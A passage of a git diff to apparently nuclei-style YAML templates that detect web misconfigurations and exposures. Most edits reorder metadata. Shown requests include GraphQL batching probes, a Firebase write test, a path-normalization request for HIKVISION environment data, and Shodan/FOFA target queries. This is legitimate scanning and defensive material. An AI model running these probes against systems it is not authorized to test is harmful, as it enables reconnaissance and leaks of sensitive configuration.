https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Struts2 Showcase" tags: apache,struts,showcase,misconfig,exposure @@ -19,6 +19,7 @@ http: - '{{BaseURL}}/struts2-showcase/showcase.action' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/apache/apache-couchdb-unauth.yaml b/http/misconfiguration/apache/apache-couchdb-unauth.yaml index 1bfaf046d0..aa15df6dec 100644 --- a/http/misconfiguration/apache/apache-couchdb-unauth.yaml +++ b/http/misconfiguration/apache/apache-couchdb-unauth.yaml @@ -10,9 +10,9 @@ info: - https://github.com/mubix/tools/blob/master/nmap/scripts/couchdb-stats.nse metadata: verified: true + max-request: 1 shodan-query: product:"CouchDB" fofa-query: app="APACHE-CouchDB" - max-request: 1 tags: apache,couchdb,unauth,misconfig http: diff --git a/http/misconfiguration/apache/apache-filename-enum.yaml b/http/misconfiguration/apache/apache-filename-enum.yaml index 6f24e33966..dc4b7230aa 100644 --- a/http/misconfiguration/apache/apache-filename-enum.yaml +++ b/http/misconfiguration/apache/apache-filename-enum.yaml @@ -8,12 +8,13 @@ info: reference: - https://hackerone.com/reports/210238 - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - tags: apache,misconfig,hackerone metadata: max-request: 1 + tags: apache,misconfig,hackerone http: - method: GET + headers: Accept: "fake/value" path: @@ -24,6 +25,7 @@ http: - type: status status: - 406 + - type: word words: - "Not Acceptable" diff --git a/http/misconfiguration/apache/apache-hbase-unauth.yaml b/http/misconfiguration/apache/apache-hbase-unauth.yaml index a662e2fada..6496a84682 100644 --- a/http/misconfiguration/apache/apache-hbase-unauth.yaml +++ b/http/misconfiguration/apache/apache-hbase-unauth.yaml @@ -4,9 +4,9 @@ info: name: Apache Hbase Unauth author: pikpikcu severity: medium - tags: apache,unauth,misconfig metadata: max-request: 1 + tags: apache,unauth,misconfig http: - method: GET @@ -15,7 +15,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'hbase.defaults.for.version' diff --git a/http/misconfiguration/apache/apache-nifi-unauth.yaml b/http/misconfiguration/apache/apache-nifi-unauth.yaml index ecf1e0b54d..7556bcf812 100644 --- a/http/misconfiguration/apache/apache-nifi-unauth.yaml +++ b/http/misconfiguration/apache/apache-nifi-unauth.yaml @@ -5,7 +5,7 @@ info: author: pwnhxl severity: high description: | - Apache NiFi server was able to be accessed because no authentication was required. + Apache NiFi server was able to be accessed because no authentication was required. reference: | - https://github.com/jm0x0/apache_nifi_processor_rce classification: @@ -13,8 +13,8 @@ info: cvss-score: 8.6 cwe-id: CWE-285 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"NiFi" fofa-query: title="nifi" && body="Did you mean" tags: misconfig,apache,nifi,unauth diff --git a/http/misconfiguration/apache/apache-storm-unauth.yaml b/http/misconfiguration/apache/apache-storm-unauth.yaml index 8f4d3c90ff..3baf9aa1f1 100644 --- a/http/misconfiguration/apache/apache-storm-unauth.yaml +++ b/http/misconfiguration/apache/apache-storm-unauth.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - tags: apache,unauth,misconfig metadata: max-request: 1 + tags: apache,unauth,misconfig http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml index 0572f5e8d7..7925b75b14 100644 --- a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml +++ b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml @@ -13,10 +13,10 @@ info: cvss-score: 8.6 cwe-id: CWE-285 metadata: - fofa-query: title="Zeppelin" + verified: true max-request: 1 shodan-query: title:"Zeppelin" - verified: true + fofa-query: title="Zeppelin" tags: misconfig,apache,zeppelin,unauth http: diff --git a/http/misconfiguration/apache/tomcat-pathnormalization.yaml b/http/misconfiguration/apache/tomcat-pathnormalization.yaml index 6ee496b2e8..62b4a825db 100644 --- a/http/misconfiguration/apache/tomcat-pathnormalization.yaml +++ b/http/misconfiguration/apache/tomcat-pathnormalization.yaml @@ -5,14 +5,14 @@ info: author: brenocss,organiccrap severity: info description: Apache Tomcat Manager Path Normalization login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system. + reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: panel,tomcat,apache,misconfig metadata: max-request: 6 + tags: panel,tomcat,apache,misconfig,intrusive http: - method: GET diff --git a/http/misconfiguration/apc-info.yaml b/http/misconfiguration/apc-info.yaml index 0813cc01f1..510cec152e 100644 --- a/http/misconfiguration/apc-info.yaml +++ b/http/misconfiguration/apc-info.yaml @@ -4,9 +4,9 @@ info: name: APCu service information leakage author: koti2 severity: low - tags: config,service,apcu,misconfig metadata: max-request: 2 + tags: config,service,apcu,misconfig http: - method: GET diff --git a/http/misconfiguration/apollo-adminservice-unauth.yaml b/http/misconfiguration/apollo-adminservice-unauth.yaml index cf40df6cad..d182269a88 100644 --- a/http/misconfiguration/apollo-adminservice-unauth.yaml +++ b/http/misconfiguration/apollo-adminservice-unauth.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.8 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"apollo-adminservice" tags: misconfig,unauth,apollo,apolloadminservice diff --git a/http/misconfiguration/application-yaml.yaml b/http/misconfiguration/application-yaml.yaml index be1ab7590c..6f57bd1f2a 100644 --- a/http/misconfiguration/application-yaml.yaml +++ b/http/misconfiguration/application-yaml.yaml @@ -5,9 +5,9 @@ info: author: Cristi vlad (@cristivlad25) severity: info description: Finds Application YAML files which often contain sensitive information. - tags: misconfig metadata: max-request: 4 + tags: misconfig http: - method: GET @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/application.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -42,4 +43,4 @@ http: - "!contains(tolower(body), '

')" - "!contains(tolower(body), '')" - "!contains(tolower(body), '')" - - "!contains(tolower(body), '' \ No newline at end of file + - '' diff --git a/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml b/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml index 6743dede39..eb61634976 100644 --- a/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml +++ b/http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -41,4 +42,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/gitlab/gitlab-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-user-enum.yaml index f824ec237f..c528bab468 100644 --- a/http/misconfiguration/gitlab/gitlab-user-enum.yaml +++ b/http/misconfiguration/gitlab/gitlab-user-enum.yaml @@ -21,11 +21,10 @@ http: payloads: user: helpers/wordlists/user-list.txt - stop-at-first-match: true + matchers-condition: and matchers: - - type: regex part: body regex: @@ -38,4 +37,4 @@ http: - type: word part: header words: - - "application/json" \ No newline at end of file + - "application/json" diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml index 6d6c242c2d..61045ea6c2 100644 --- a/http/misconfiguration/gitlist-disclosure.yaml +++ b/http/misconfiguration/gitlist-disclosure.yaml @@ -22,4 +22,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index ccbe034b19..3f6dcce7db 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -5,8 +5,8 @@ info: author: tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Global Traffic Statistics" tags: misconfig,global,exposure diff --git a/http/misconfiguration/glpi-directory-listing.yaml b/http/misconfiguration/glpi-directory-listing.yaml index 7849e126f2..ffe3957309 100644 --- a/http/misconfiguration/glpi-directory-listing.yaml +++ b/http/misconfiguration/glpi-directory-listing.yaml @@ -5,9 +5,9 @@ info: author: RedTeamBrasil,ImNightmaree severity: low description: In certain cases, system administrators leave directory listing enabled which can sometimes expose sensitive files. - tags: glpi,misconfig metadata: max-request: 2 + tags: glpi,misconfig http: - raw: diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index a57722007f..db30dd0326 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -20,7 +20,6 @@ http: matchers-condition: and matchers: - - type: status status: - 200 diff --git a/http/misconfiguration/google/insecure-firebase-database.yaml b/http/misconfiguration/google/insecure-firebase-database.yaml index 1258ccf39d..f3fc4f1be5 100644 --- a/http/misconfiguration/google/insecure-firebase-database.yaml +++ b/http/misconfiguration/google/insecure-firebase-database.yaml @@ -8,9 +8,9 @@ info: reference: - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty metadata: - max-request: 2 verified: true - tags: firebase,google,misconfig + max-request: 2 + tags: firebase,google,misconfig,intrusive http: - raw: @@ -20,12 +20,12 @@ http: Content-Type: application/json {"id":"insecure-firebase-database"} - - | GET /{{randstr}}.json HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/gopher-server.yaml b/http/misconfiguration/gopher-server.yaml index aae625d627..bbd1b0cd25 100644 --- a/http/misconfiguration/gopher-server.yaml +++ b/http/misconfiguration/gopher-server.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=627579942745862&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Gopher Server" tags: misconfig,gopher,server @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index de29acd7db..c511bf4585 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -7,17 +7,16 @@ info: description: | GraphQL supports aliasing of multiple sub-queries into a single queries. This allows users to request multiple objects or multiple instances of objects efficiently. However, an attacker can leverage this feature to evade many security measures, including rate limit. + remediation: | + Limit queries aliasing in your GraphQL Engine to ensure mitigation of aliasing-based attacks. reference: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security/ - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin - remediation: | - Limit queries aliasing in your GraphQL Engine to ensure mitigation of aliasing-based attacks. - tags: graphql,misconfig metadata: max-request: 2 - + tags: graphql,misconfig variables: str: "{{to_lower(rand_text_alpha(5))}}" @@ -29,7 +28,6 @@ http: Content-Type: application/json {"query":"query {\n {{str}}1:__typename \n {{str}}2:__typename \n {{str}}3:__typename \n {{str}}4:__typename \n {{str}}5:__typename \n {{str}}6:__typename \n }"} - - | POST /api/graphql HTTP/1.1 Host: {{Hostname}} @@ -38,6 +36,7 @@ http: {"query":"query {\n {{str}}1:__typename \n {{str}}2:__typename \n {{str}}3:__typename \n {{str}}4:__typename \n {{str}}5:__typename \n {{str}}6:__typename \n }"} stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -51,4 +50,4 @@ http: - type: word part: header words: - - "application/json" \ No newline at end of file + - "application/json" diff --git a/http/misconfiguration/graphql/graphql-array-batching.yaml b/http/misconfiguration/graphql/graphql-array-batching.yaml index 77916bf92b..ad81397931 100644 --- a/http/misconfiguration/graphql/graphql-array-batching.yaml +++ b/http/misconfiguration/graphql/graphql-array-batching.yaml @@ -7,15 +7,15 @@ info: description: | Some GraphQL engines support batching of multiple queries into a single request. This allows users to request multiple objects or multiple instances of objects efficiently. However, an attacker can leverage this feature to evade many security measures, including Rate Limit. + remediation: | + Deactivate or limit Batching in your GraphQL engine. reference: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://graphql.security/ - remediation: | - Deactivate or limit Batching in your GraphQL engine. - tags: graphql,misconfig metadata: max-request: 2 + tags: graphql,misconfig http: - raw: @@ -25,7 +25,6 @@ http: Content-Type: application/json [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] - - | POST /api/graphql HTTP/1.1 Host: {{Hostname}} @@ -34,6 +33,7 @@ http: [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/graphql/graphql-field-suggestion.yaml b/http/misconfiguration/graphql/graphql-field-suggestion.yaml index f87901f0ee..279aca9a70 100644 --- a/http/misconfiguration/graphql/graphql-field-suggestion.yaml +++ b/http/misconfiguration/graphql/graphql-field-suggestion.yaml @@ -13,9 +13,9 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security - tags: graphql,misconfig metadata: max-request: 2 + tags: graphql,misconfig http: - raw: @@ -25,7 +25,6 @@ http: Content-Type: application/json {"query":"query {\n __schema {\n directive\n }\n}","variables":null} - - | POST /api/graphql HTTP/1.1 Host: {{Hostname}} @@ -34,6 +33,7 @@ http: {"query":"query {\n __schema {\n directive\n }\n}","variables":null} stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/graphql/graphql-get-method.yaml b/http/misconfiguration/graphql/graphql-get-method.yaml index fc02bf4c64..3a5b347576 100644 --- a/http/misconfiguration/graphql/graphql-get-method.yaml +++ b/http/misconfiguration/graphql/graphql-get-method.yaml @@ -12,9 +12,9 @@ info: - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security/ - tags: graphql,misconfig metadata: max-request: 2 + tags: graphql,misconfig http: - method: GET @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/api/graphql?query={__typename}" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/graphql/graphql-playground.yaml b/http/misconfiguration/graphql/graphql-playground.yaml index f9ee20240b..45376df1b6 100644 --- a/http/misconfiguration/graphql/graphql-playground.yaml +++ b/http/misconfiguration/graphql/graphql-playground.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/graphql/graphql-playground metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"GraphQL Playground" tags: misconfig,graphql diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 4d42d37375..13e11d8e1b 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Grav Register Admin User" tags: grav,register,admin,misconfig diff --git a/http/misconfiguration/hadoop-unauth-rce.yaml b/http/misconfiguration/hadoop-unauth-rce.yaml index bfbfb387e9..8eb746017f 100644 --- a/http/misconfiguration/hadoop-unauth-rce.yaml +++ b/http/misconfiguration/hadoop-unauth-rce.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-306 - tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig metadata: max-request: 1 + tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig http: - method: POST diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 9e34eccc31..e660fbdf0b 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"haproxy exporter" tags: haproxy,exposure,debug,misconfig diff --git a/http/misconfiguration/haproxy-status.yaml b/http/misconfiguration/haproxy-status.yaml index 4ff3651b22..71cbb53085 100644 --- a/http/misconfiguration/haproxy-status.yaml +++ b/http/misconfiguration/haproxy-status.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: logs,haproxy,edb,misconfig metadata: max-request: 2 + tags: logs,haproxy,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/healthchecks-ui-exposure.yaml b/http/misconfiguration/healthchecks-ui-exposure.yaml index e5c1b2546c..1a207d6cde 100644 --- a/http/misconfiguration/healthchecks-ui-exposure.yaml +++ b/http/misconfiguration/healthchecks-ui-exposure.yaml @@ -5,8 +5,8 @@ info: author: tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Health Checks UI" tags: misconfig,exposure @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index d3617cf526..1346598316 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -5,8 +5,8 @@ info: author: tess severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"HFS /" tags: misconfig,hfs,exposure diff --git a/http/misconfiguration/hikivision-env.yaml b/http/misconfiguration/hikivision-env.yaml index e242acded9..e2355db2aa 100644 --- a/http/misconfiguration/hikivision-env.yaml +++ b/http/misconfiguration/hikivision-env.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md - https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20综合安防管理平台%20env%20信息泄漏漏洞.html metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: app="HIKVISION-综合安防管理平台" tags: misconfig,hikivision,springboot,env @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/artemis/1/..;/env" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/hivequeue-agent.yaml b/http/misconfiguration/hivequeue-agent.yaml index 8c698e94c8..7a179b55cc 100644 --- a/http/misconfiguration/hivequeue-agent.yaml +++ b/http/misconfiguration/hivequeue-agent.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5555061814557647/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"HiveQueue" tags: misconfig,hivequeue diff --git a/http/misconfiguration/hp/unauthorized-hp-printer.yaml b/http/misconfiguration/hp/unauthorized-hp-printer.yaml index 917bd960d3..e9847e4da3 100644 --- a/http/misconfiguration/hp/unauthorized-hp-printer.yaml +++ b/http/misconfiguration/hp/unauthorized-hp-printer.yaml @@ -4,9 +4,9 @@ info: name: Unauthorized HP Printer author: pussycat0x severity: high - tags: hp,iot,unauth,misconfig metadata: max-request: 1 + tags: hp,iot,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/hpe-system-management-anonymous.yaml b/http/misconfiguration/hpe-system-management-anonymous.yaml index 7beaed5ce1..4e1afc4ad9 100644 --- a/http/misconfiguration/hpe-system-management-anonymous.yaml +++ b/http/misconfiguration/hpe-system-management-anonymous.yaml @@ -4,9 +4,9 @@ info: name: HPE System Management Anonymous Access author: divya_mudgal severity: low - tags: hp,unauth,misconfig metadata: max-request: 1 + tags: hp,unauth,misconfig http: - method: GET @@ -20,4 +20,4 @@ http: words: - "username = \"hpsmh_anonymous\";" - "var host_addr = '" - - "var ip_addr = '" \ No newline at end of file + - "var ip_addr = '" diff --git a/http/misconfiguration/http-missing-security-headers.yaml b/http/misconfiguration/http-missing-security-headers.yaml index f953b361f1..694461bd62 100644 --- a/http/misconfiguration/http-missing-security-headers.yaml +++ b/http/misconfiguration/http-missing-security-headers.yaml @@ -6,9 +6,9 @@ info: severity: info description: | This template searches for missing HTTP security headers. The impact of these missing headers can vary. - tags: misconfig,headers,generic metadata: max-request: 1 + tags: misconfig,headers,generic http: - method: GET @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 3 + matchers-condition: or matchers: - type: dsl diff --git a/http/misconfiguration/httponly-cookie-detect.yaml b/http/misconfiguration/httponly-cookie-detect.yaml index ef53445d00..066ac9377d 100644 --- a/http/misconfiguration/httponly-cookie-detect.yaml +++ b/http/misconfiguration/httponly-cookie-detect.yaml @@ -10,10 +10,10 @@ info: - https://stackoverflow.com/questions/4316539/how-do-i-test-httponly-cookie-flag classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,http,cookie,generic http: diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index 60a408ba10..abec5bca66 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/#Z7_00000000000000A0BR2B300IO0" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 1dca452728..572345f3be 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/ metadata: - max-request: 1 verified: true + max-request: 1 tags: ibm,websphere,exposure,misconfig http: diff --git a/http/misconfiguration/installer/acunetix-360-installer.yaml b/http/misconfiguration/installer/acunetix-360-installer.yaml index 4d6a084e40..2111decca7 100644 --- a/http/misconfiguration/installer/acunetix-360-installer.yaml +++ b/http/misconfiguration/installer/acunetix-360-installer.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-347188002 tags: misconfig,exposure,install,acunetix diff --git a/http/misconfiguration/installer/akeeba-installer.yaml b/http/misconfiguration/installer/akeeba-installer.yaml index be185b757c..9e3ce48074 100644 --- a/http/misconfiguration/installer/akeeba-installer.yaml +++ b/http/misconfiguration/installer/akeeba-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Akeeba Backup" tags: misconfig,akeeba,install,exposure diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml index 179229bea6..35ea2fc1c4 100644 --- a/http/misconfiguration/installer/alma-installer.yaml +++ b/http/misconfiguration/installer/alma-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Alma Installation" tags: misconfig,alma,install,exposure diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 0535ad028f..9f47e7952d 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"For the Love of Music - Installation" tags: misconfig,ampache,install,exposure diff --git a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml index 7f0b474afa..def93eb7a4 100644 --- a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml +++ b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Bamboo setup wizard" tags: misconfig,atlassian,bamboo,setup,installer diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 448e1626a5..dee5744e86 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -10,8 +10,8 @@ info: cvss-score: 8.2 cwe-id: CWE-459 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" tags: panel,install,avideo,misconfig diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index 2529333ecf..c56583420b 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Bagisto Installer" tags: misconfig,bagisto,install,exposure @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/binom-installer.yaml b/http/misconfiguration/installer/binom-installer.yaml index 618165a29a..f99d529906 100644 --- a/http/misconfiguration/installer/binom-installer.yaml +++ b/http/misconfiguration/installer/binom-installer.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Install Binom" tags: misconfig,binom,install,exposure @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/?page=step_1' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml index 6daf8b0d2d..11c11c85f9 100644 --- a/http/misconfiguration/installer/bitrix24-installer.yaml +++ b/http/misconfiguration/installer/bitrix24-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-2115208104 tags: misconfig,bitrix24,install,exposure diff --git a/http/misconfiguration/installer/blesta-installer.yaml b/http/misconfiguration/installer/blesta-installer.yaml index fe7199aa13..85c56076c4 100644 --- a/http/misconfiguration/installer/blesta-installer.yaml +++ b/http/misconfiguration/installer/blesta-installer.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Blesta installer" tags: misconfig,blesta,install,exposure diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 8e23f36ba8..b72c4a960d 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -12,8 +12,8 @@ info: cvss-score: 9.4 cwe-id: CWE-284 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"- setup" html:"Modem setup" tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig @@ -21,12 +21,14 @@ http: - method: GET path: - "{{BaseURL}}/html/setup.html" + matchers-condition: and matchers: - type: word part: header words: - "CirCarLife Scada" + - type: word words: - "- setup" @@ -34,6 +36,7 @@ http: - "Modem setup" - "Security setup" condition: and + - type: status status: - 200 diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml index c83f4b93f4..acfc5346f5 100644 --- a/http/misconfiguration/installer/clipbucket-installer.yaml +++ b/http/misconfiguration/installer/clipbucket-installer.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: high metadata: - max-request: 1 verified: true - fofa-query: icon_hash="538583492" + max-request: 1 shodan-query: http.favicon.hash:538583492 + fofa-query: icon_hash="538583492" tags: misconfig,clipbucket,install,exposure http: diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml index 910f57c3eb..5cfca43706 100644 --- a/http/misconfiguration/installer/cloudcenter-Installer.yaml +++ 